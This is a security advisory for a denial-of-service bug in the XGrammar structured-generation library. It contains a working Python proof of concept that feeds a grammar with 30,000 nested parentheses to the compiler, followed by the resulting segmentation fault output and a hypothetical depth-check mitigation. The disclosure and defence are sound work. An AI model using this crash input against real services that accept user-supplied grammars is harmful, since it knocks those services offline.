CVE-2026-25048 is a low-severity vulnerability with a CVSS score of 0.0. No exploits are currently known, and patches are available.
EPSS indicates a very low probability of exploitation. EPSS predicts the probability of exploitation in the next 30 days based on real-world threat data, complementing CVSS severity scores with an assessment of actual risk.
Constructing a malicious grammar rule containing 30,000 layers of nested parentheses triggers a stack overflow or memory exhaustion: the deeply nested syntax crashes the process with a segmentation fault (core dump).
#!/usr/bin/env python3
"""
XGrammar - Nested-Grammar Segfault PoC
(adapted from a math expression generation example)
"""
import torch
import xgrammar as xgr
from transformers import AutoConfig, AutoModelForCausalLM, AutoTokenizer

# Malicious grammar: 30,000 unclosed opening parentheses
s = '(' * 30000 + 'a'
grammar = f"root ::= {s}"


def main():
    device = "cuda" if torch.cuda.is_available() else "cpu"
    model_name = "Qwen/Qwen2.5-0.5B-Instruct"

    # Load model and tokenizer
    model = AutoModelForCausalLM.from_pretrained(
        model_name,
        torch_dtype=torch.float16 if device == "cuda" else torch.float32,
        device_map=device,
    )
    tokenizer = AutoTokenizer.from_pretrained(model_name)
    config = AutoConfig.from_pretrained(model_name)

    # Deeply nested grammar that triggers the crash
    math_grammar = grammar

    # Set up the grammar compiler
    tokenizer_info = xgr.TokenizerInfo.from_huggingface(
        tokenizer,
        vocab_size=config.vocab_size,
    )
    compiler = xgr.GrammarCompiler(tokenizer_info)
    compiled_grammar = compiler.compile_grammar(math_grammar)

    # Generate with the compiled grammar enforced
    prompt = "Math: "
    inputs = tokenizer(prompt, return_tensors="pt").to(device)
    xgr_processor = xgr.contrib.hf.LogitsProcessor(compiled_grammar)
    output_ids = model.generate(
        **inputs,
        max_new_tokens=50,
        logits_processor=[xgr_processor],
    )
    result = tokenizer.decode(
        output_ids[0][len(inputs.input_ids[0]):],
        skip_special_tokens=True,
    )
    print(f"Generated expression: {result}")


if __name__ == "__main__":
    main()
> pip show xgrammar
Name: xgrammar
Version: 0.1.31
Summary: Efficient, Flexible and Portable Structured Generation
Home-page:
Author: MLC Team
Author-email:
License: Apache 2.0
Location: /home/yuelinwang/.local/lib/python3.10/site-packages
Requires: numpy, pydantic, torch, transformers, triton, typing-extensions
Required-by:
> python3 1.py
`torch_dtype` is deprecated! Use `dtype` instead!
Segmentation fault (core dumped)
Impact: denial of service (DoS).
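Until a patched XGrammar release is installed, callers can defensively reject pathological grammars before handing them to the native compiler. The sketch below is a hypothetical mitigation, not part of the xgrammar API: `max_nesting_depth`, `MAX_DEPTH`, and `safe_compile` are illustrative names, and the depth cap is an arbitrary choice.

```python
# Hypothetical pre-compilation guard; names and limit are illustrative,
# not part of the xgrammar API.

MAX_DEPTH = 256  # arbitrary cap; tune to the deepest grammar actually needed


def max_nesting_depth(grammar: str) -> int:
    """Return the maximum parenthesis nesting depth in a grammar string."""
    depth = 0
    max_depth = 0
    for ch in grammar:
        if ch == '(':
            depth += 1
            max_depth = max(max_depth, depth)
        elif ch == ')':
            depth = max(depth - 1, 0)  # tolerate unbalanced input
    return max_depth


def safe_compile(compiler, grammar: str):
    """Reject suspiciously deep grammars before invoking the native compiler."""
    depth = max_nesting_depth(grammar)
    if depth > MAX_DEPTH:
        raise ValueError(
            f"grammar nesting depth {depth} exceeds limit {MAX_DEPTH}"
        )
    return compiler.compile_grammar(grammar)


# The PoC input from above would be rejected instead of crashing the process:
poc = "root ::= " + '(' * 30000 + 'a'
print(max_nesting_depth(poc))  # 30000
```

A depth check like this runs in a single linear pass over the grammar string, so it adds negligible overhead compared to the native compilation it guards.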